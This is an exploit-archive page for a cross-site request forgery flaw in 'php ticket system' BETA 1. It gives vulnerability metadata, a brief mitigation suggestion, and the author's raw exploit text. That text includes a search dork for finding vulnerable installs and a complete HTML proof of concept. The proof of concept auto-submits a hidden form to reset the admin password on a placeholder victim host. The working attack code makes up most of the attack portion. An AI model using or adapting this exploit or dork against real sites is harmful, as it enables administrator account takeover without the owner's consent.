php ticket system csrf

vendor:

php ticket system

by:

Pablo '7days' Riberio

7,5

CVSS

HIGH

CSRF

352

CWE

Product Name: php ticket system

Affected Version From: BETA 1

Affected Version To: BETA 1

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows/Internet Explorer

N/A

This exploit allows an attacker to reset the admin password of the php ticket system BETA 1 via Cross-Site Request Forgery (CSRF). The vulnerable URL is inurl:ticket/?p=process_change_password&id=1.

Mitigation:

Implementing a CSRF token in the application can prevent this type of attack.

Source

Exploit-DB raw data:

   1.
   #########################################################################
   2.
   3. [+] Exploit Title : php ticket system csrf
   4. [+] Author : Pablo '7days' Riberio
   5. [+] Team: So Good Security
   6. [+] Other 0days : http://pastebin.com/u/7days
   7. [+] Version : <= BETA 1
   8. [+] Tested on : windows/internet explorer
   9. [+] Details: Reset admin password via CSRF
   10. [+] Vendor: http://sourceforge.net/projects/phpticketsystem/
   11. [+] Duck : inurl:ticket/?p=process_change_password&id=1
   12.
   #########################################################################
   13.
   14.
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   15. Gr33tz: Greg, Sonya from Mortal Kombat, the owner of the japanese
   steak creation factory,
   16. my home boy linus, all the cockneys and my grandma <3
   17.
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   18. no thnx 2: microsoft, windoz, estate agents and recruiters
   19.
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   20.                       `..`.:::.`
   21.                      .://o:::///:.
   22.                     `::+y+::::::/+/`
   23.                      :/++/::/:/--:+o:`
   24.                      `://:-:/-/:.-:/oo.
   25.                       `/-.-:::/o---::+o.
   26.                        ....-:/+hs::--:+o
   27.                         .``-//ohh+----:+.
   28.                        `.``-/+syhs:----/+`
   29.                       .-.`.-:+syyo:--.-:+/
   30.                     `---.`.-/+yo/:-----:+o.
   31.                    .::-...-:+/o/-.-----:+so`
   32.                  .-::-...-:::::-----:://osy:
   33.                 .::-....--:::----::/+ooosys-
   34.                `:--.....-:/:::::/+osyyyyo:`
   35. `             `----...--:/++++oosyyhhy+-`
   36. :::::-------:::---..--:/+oossyyhhhhs/.
   37. ::::::-------:--.-.--:+osyyyhhhhho-`
   38. ------------.....--:/+oyyhhhhhy+.
   39. -----------...---:/+osyhhhhyo:`
   40. :::::-------:::/+osyyhhhhs/.
   41. ++++++++++++oossyyhhhhs/.
   42. sssssssyyyyhhhhhhhyo:.`
   43.         ``..---..`
   44.
   45.                           portuguese cyber army
   46.
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   47. [+] Begin 0day
   48.
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
   49.
   50. <html>
   51. <head>
   52. </head>
   53.   <body>
   54. <!--  php ticket  -->
   55.     <form action="
   http://www.victim.com/ticket/?p=process_change_password&id=1"
   method="POST" id="csrf" name="csrf" onload="go()">
   56.       <input type="hidden" name="new_password" value="12351235"
   />
   57.       <input type="hidden" name="confirm_password"
   value="12351235" />
   58.       <input type="hidden" name="submit" value="Change Password"
   />
   59.       <input type="submit" value="Submit form" />
   60.     </form>
   61.     </form>
   62. <script language="JavaScript" type="text/javascript">
   63. document.csrf.submit();
   64. </script>
   65.   </body>
   66.
   67. </html>
   68.
   69.
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
   70. [+] End 0day
   71.
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-